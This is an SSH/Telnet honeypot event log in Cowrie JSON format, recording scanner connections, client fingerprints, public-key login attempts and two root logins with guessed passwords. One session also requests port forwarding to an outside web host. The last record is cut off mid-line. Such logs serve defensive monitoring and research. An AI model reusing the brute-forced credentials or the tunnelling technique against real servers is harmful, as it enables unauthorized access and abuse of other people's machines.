{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:46:26.827577Z","src_ip":"216.107.136.92","session":"7c1f5bf6eb16"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:46:27.268304Z","src_ip":"216.107.136.92","session":"7c1f5bf6eb16"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:46:27.370889Z","src_ip":"216.107.136.92","session":"22164b39cf32"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:46:27.372095Z","src_ip":"216.107.136.92","session":"7c1f5bf6eb16"}
{"eventid":"cowrie.session.closed","duration":120.03219437599182,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:47:16.087382Z","src_ip":"212.227.235.229","session":"f4563dc59557"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53910,"dst_ip":"1.2.3.4","dst_port":22,"session":"1427b7588cc2","protocol":"ssh","message":"New connection: 217.72.205.35:53910 (1.2.3.4:22) [session: 1427b7588cc2]","sensor":"my-vps","timestamp":"2025-09-08T20:51:00.351859Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:51:00.353280Z","src_ip":"217.72.205.35","session":"1427b7588cc2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":17138,"dst_ip":"1.2.3.4","dst_port":22,"session":"26f32cfc8ac0","protocol":"ssh","message":"New connection: 212.227.235.229:17138 (1.2.3.4:22) [session: 26f32cfc8ac0]","sensor":"my-vps","timestamp":"2025-09-08T20:54:54.544904Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:54:54.548264Z","src_ip":"212.227.235.229","session":"26f32cfc8ac0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":17491,"dst_ip":"1.2.3.4","dst_port":22,"session":"2521c8f49e4f","protocol":"ssh","message":"New connection: 212.227.235.229:17491 (1.2.3.4:22) [session: 2521c8f49e4f]","sensor":"my-vps","timestamp":"2025-09-08T20:54:54.710955Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T20:54:54.713862Z","src_ip":"212.227.235.229","session":"2521c8f49e4f"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T20:54:54.872082Z","src_ip":"212.227.235.229","session":"2521c8f49e4f"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:54:55.513324Z","src_ip":"212.227.235.229","session":"2521c8f49e4f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T20:54:55.675092Z","session":"2521c8f49e4f"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:56:04.707858Z","src_ip":"212.227.235.229","session":"2521c8f49e4f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65468,"dst_ip":"1.2.3.4","dst_port":22,"session":"5754aba8427d","protocol":"ssh","message":"New connection: 217.72.205.35:65468 (1.2.3.4:22) [session: 5754aba8427d]","sensor":"my-vps","timestamp":"2025-09-08T20:57:31.492028Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:57:31.493710Z","src_ip":"217.72.205.35","session":"5754aba8427d"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":37164,"dst_ip":"1.2.3.4","dst_port":22,"session":"b26197cd254a","protocol":"ssh","message":"New connection: 139.19.117.131:37164 (1.2.3.4:22) [session: b26197cd254a]","sensor":"my-vps","timestamp":"2025-09-08T20:57:35.423527Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T20:57:35.424466Z","src_ip":"139.19.117.131","session":"b26197cd254a"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-08T20:57:35.442133Z","src_ip":"139.19.117.131","session":"b26197cd254a"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"77:f6:11:2a:07:db:1b:8f:e3:e2:e2:f0:6f:67:e2:78","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6apTpBLxylca9D2EVjfr8xa6OadS2c0oR4RYLkJiIp2XoWkJKqxVodz0s2gfQrMb9qr3oJQVoT4M1WHd829D5Wu2kJY4RMFSo+Rb2dszg0PQJ5Ug1pEW1DedYR379sjoIiF/qbaDzq3FtkUx9+5E/BiqdMGyncml3yinN6HuNH+Fnhv6TtS45Re6gI1rA21qFguBF5U3yPFKeF5ElH997x/0rf3Qr01v38F2994IEXZ3fiaZTkw7k/ul9CnuCuIlCkPGeO7xkpR/70sU077scxbArlCe/ch5BSBK9u8nOCBUBV7AlgZ9RojfTp/wbqqg20zfB7pwEaaMI25zP5QsF","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 77:f6:11:2a:07:db:1b:8f:e3:e2:e2:f0:6f:67:e2:78","sensor":"my-vps","timestamp":"2025-09-08T20:57:35.479227Z","src_ip":"139.19.117.131","session":"b26197cd254a"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"77:f6:11:2a:07:db:1b:8f:e3:e2:e2:f0:6f:67:e2:78","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6apTpBLxylca9D2EVjfr8xa6OadS2c0oR4RYLkJiIp2XoWkJKqxVodz0s2gfQrMb9qr3oJQVoT4M1WHd829D5Wu2kJY4RMFSo+Rb2dszg0PQJ5Ug1pEW1DedYR379sjoIiF/qbaDzq3FtkUx9+5E/BiqdMGyncml3yinN6HuNH+Fnhv6TtS45Re6gI1rA21qFguBF5U3yPFKeF5ElH997x/0rf3Qr01v38F2994IEXZ3fiaZTkw7k/ul9CnuCuIlCkPGeO7xkpR/70sU077scxbArlCe/ch5BSBK9u8nOCBUBV7AlgZ9RojfTp/wbqqg20zfB7pwEaaMI25zP5QsF","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T20:57:35.479873Z","src_ip":"139.19.117.131","session":"b26197cd254a"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"77:f6:11:2a:07:db:1b:8f:e3:e2:e2:f0:6f:67:e2:78","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6apTpBLxylca9D2EVjfr8xa6OadS2c0oR4RYLkJiIp2XoWkJKqxVodz0s2gfQrMb9qr3oJQVoT4M1WHd829D5Wu2kJY4RMFSo+Rb2dszg0PQJ5Ug1pEW1DedYR379sjoIiF/qbaDzq3FtkUx9+5E/BiqdMGyncml3yinN6HuNH+Fnhv6TtS45Re6gI1rA21qFguBF5U3yPFKeF5ElH997x/0rf3Qr01v38F2994IEXZ3fiaZTkw7k/ul9CnuCuIlCkPGeO7xkpR/70sU077scxbArlCe/ch5BSBK9u8nOCBUBV7AlgZ9RojfTp/wbqqg20zfB7pwEaaMI25zP5QsF","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 77:f6:11:2a:07:db:1b:8f:e3:e2:e2:f0:6f:67:e2:78","sensor":"my-vps","timestamp":"2025-09-08T20:57:35.498345Z","src_ip":"139.19.117.131","session":"b26197cd254a"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"77:f6:11:2a:07:db:1b:8f:e3:e2:e2:f0:6f:67:e2:78","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6apTpBLxylca9D2EVjfr8xa6OadS2c0oR4RYLkJiIp2XoWkJKqxVodz0s2gfQrMb9qr3oJQVoT4M1WHd829D5Wu2kJY4RMFSo+Rb2dszg0PQJ5Ug1pEW1DedYR379sjoIiF/qbaDzq3FtkUx9+5E/BiqdMGyncml3yinN6HuNH+Fnhv6TtS45Re6gI1rA21qFguBF5U3yPFKeF5ElH997x/0rf3Qr01v38F2994IEXZ3fiaZTkw7k/ul9CnuCuIlCkPGeO7xkpR/70sU077scxbArlCe/ch5BSBK9u8nOCBUBV7AlgZ9RojfTp/wbqqg20zfB7pwEaaMI25zP5QsF","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T20:57:35.499951Z","src_ip":"139.19.117.131","session":"b26197cd254a"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:57:45.423744Z","src_ip":"139.19.117.131","session":"b26197cd254a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39330,"dst_ip":"1.2.3.4","dst_port":23,"session":"83d38a0122bc","protocol":"telnet","message":"New connection: 212.227.235.229:39330 (1.2.3.4:23) [session: 83d38a0122bc]","sensor":"my-vps","timestamp":"2025-09-08T20:58:21.373414Z"}
{"eventid":"cowrie.session.closed","duration":7.7981812953948975,"message":"Connection lost after 7 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:58:29.171525Z","src_ip":"212.227.235.229","session":"83d38a0122bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33676,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f40a60cf2f9","protocol":"ssh","message":"New connection: 212.227.235.229:33676 (1.2.3.4:22) [session: 8f40a60cf2f9]","sensor":"my-vps","timestamp":"2025-09-08T21:01:42.985510Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T21:01:42.986141Z","src_ip":"212.227.235.229","session":"8f40a60cf2f9"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-08T21:01:43.088714Z","src_ip":"212.227.235.229","session":"8f40a60cf2f9"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"fc:fe:0e:a0:8f:95:2d:75:6c:b3:04:67:e3:1e:da:1c","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc3BlbiQaznPT8TScrs9YIzmrpI9Lpa4LtCjB5z0LuQ4o6XwvzomxAixn2F1jaUl175Cxcg3PmUsPOLE+WeWicKqL2YZ46SotjZgnS6JjXpuZVi7V0DSiXu0itlwWDC9m8huBvUBSIsDCsgb9OeG6rlrCyZgTW+qZciK+KZ8rwlFp3CFyxoF2122ueOnl5pAUCy1iHqGun03dMdUxA1d3KnxSZ3NQrYiH69dc8/YhV4SriOW9psc0pv9KeBLF0OXHtEAdbnSlwfk2uTjjBMK0nDidl7wS52Ygi/H4+P+4EXkSzf4Jj4/L6P3c5rLC3/l3RFdo1T7EQ8fH6NsTYJNZ7","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint fc:fe:0e:a0:8f:95:2d:75:6c:b3:04:67:e3:1e:da:1c","sensor":"my-vps","timestamp":"2025-09-08T21:01:43.291855Z","src_ip":"212.227.235.229","session":"8f40a60cf2f9"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"fc:fe:0e:a0:8f:95:2d:75:6c:b3:04:67:e3:1e:da:1c","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc3BlbiQaznPT8TScrs9YIzmrpI9Lpa4LtCjB5z0LuQ4o6XwvzomxAixn2F1jaUl175Cxcg3PmUsPOLE+WeWicKqL2YZ46SotjZgnS6JjXpuZVi7V0DSiXu0itlwWDC9m8huBvUBSIsDCsgb9OeG6rlrCyZgTW+qZciK+KZ8rwlFp3CFyxoF2122ueOnl5pAUCy1iHqGun03dMdUxA1d3KnxSZ3NQrYiH69dc8/YhV4SriOW9psc0pv9KeBLF0OXHtEAdbnSlwfk2uTjjBMK0nDidl7wS52Ygi/H4+P+4EXkSzf4Jj4/L6P3c5rLC3/l3RFdo1T7EQ8fH6NsTYJNZ7","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T21:01:43.292723Z","src_ip":"212.227.235.229","session":"8f40a60cf2f9"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"fc:fe:0e:a0:8f:95:2d:75:6c:b3:04:67:e3:1e:da:1c","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc3BlbiQaznPT8TScrs9YIzmrpI9Lpa4LtCjB5z0LuQ4o6XwvzomxAixn2F1jaUl175Cxcg3PmUsPOLE+WeWicKqL2YZ46SotjZgnS6JjXpuZVi7V0DSiXu0itlwWDC9m8huBvUBSIsDCsgb9OeG6rlrCyZgTW+qZciK+KZ8rwlFp3CFyxoF2122ueOnl5pAUCy1iHqGun03dMdUxA1d3KnxSZ3NQrYiH69dc8/YhV4SriOW9psc0pv9KeBLF0OXHtEAdbnSlwfk2uTjjBMK0nDidl7wS52Ygi/H4+P+4EXkSzf4Jj4/L6P3c5rLC3/l3RFdo1T7EQ8fH6NsTYJNZ7","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint fc:fe:0e:a0:8f:95:2d:75:6c:b3:04:67:e3:1e:da:1c","sensor":"my-vps","timestamp":"2025-09-08T21:01:43.394575Z","src_ip":"212.227.235.229","session":"8f40a60cf2f9"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"fc:fe:0e:a0:8f:95:2d:75:6c:b3:04:67:e3:1e:da:1c","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc3BlbiQaznPT8TScrs9YIzmrpI9Lpa4LtCjB5z0LuQ4o6XwvzomxAixn2F1jaUl175Cxcg3PmUsPOLE+WeWicKqL2YZ46SotjZgnS6JjXpuZVi7V0DSiXu0itlwWDC9m8huBvUBSIsDCsgb9OeG6rlrCyZgTW+qZciK+KZ8rwlFp3CFyxoF2122ueOnl5pAUCy1iHqGun03dMdUxA1d3KnxSZ3NQrYiH69dc8/YhV4SriOW9psc0pv9KeBLF0OXHtEAdbnSlwfk2uTjjBMK0nDidl7wS52Ygi/H4+P+4EXkSzf4Jj4/L6P3c5rLC3/l3RFdo1T7EQ8fH6NsTYJNZ7","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T21:01:43.395171Z","src_ip":"212.227.235.229","session":"8f40a60cf2f9"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:01:52.985504Z","src_ip":"212.227.235.229","session":"8f40a60cf2f9"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62886,"dst_ip":"1.2.3.4","dst_port":22,"session":"e47784bb2270","protocol":"ssh","message":"New connection: 217.72.205.35:62886 (1.2.3.4:22) [session: e47784bb2270]","sensor":"my-vps","timestamp":"2025-09-08T21:04:23.150953Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:04:23.152124Z","src_ip":"217.72.205.35","session":"e47784bb2270"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63756,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ec44d9d9157","protocol":"ssh","message":"New connection: 217.72.205.35:63756 (1.2.3.4:22) [session: 1ec44d9d9157]","sensor":"my-vps","timestamp":"2025-09-08T21:10:59.301033Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:10:59.302213Z","src_ip":"217.72.205.35","session":"1ec44d9d9157"}
{"eventid":"cowrie.session.connect","src_ip":"64.226.89.172","src_port":6102,"dst_ip":"1.2.3.4","dst_port":22,"session":"62c67e9d3307","protocol":"ssh","message":"New connection: 64.226.89.172:6102 (1.2.3.4:22) [session: 62c67e9d3307]","sensor":"my-vps","timestamp":"2025-09-08T21:11:08.144871Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-09-08T21:11:08.170247Z","src_ip":"64.226.89.172","session":"62c67e9d3307"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-08T21:11:08.188690Z","src_ip":"64.226.89.172","session":"62c67e9d3307"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 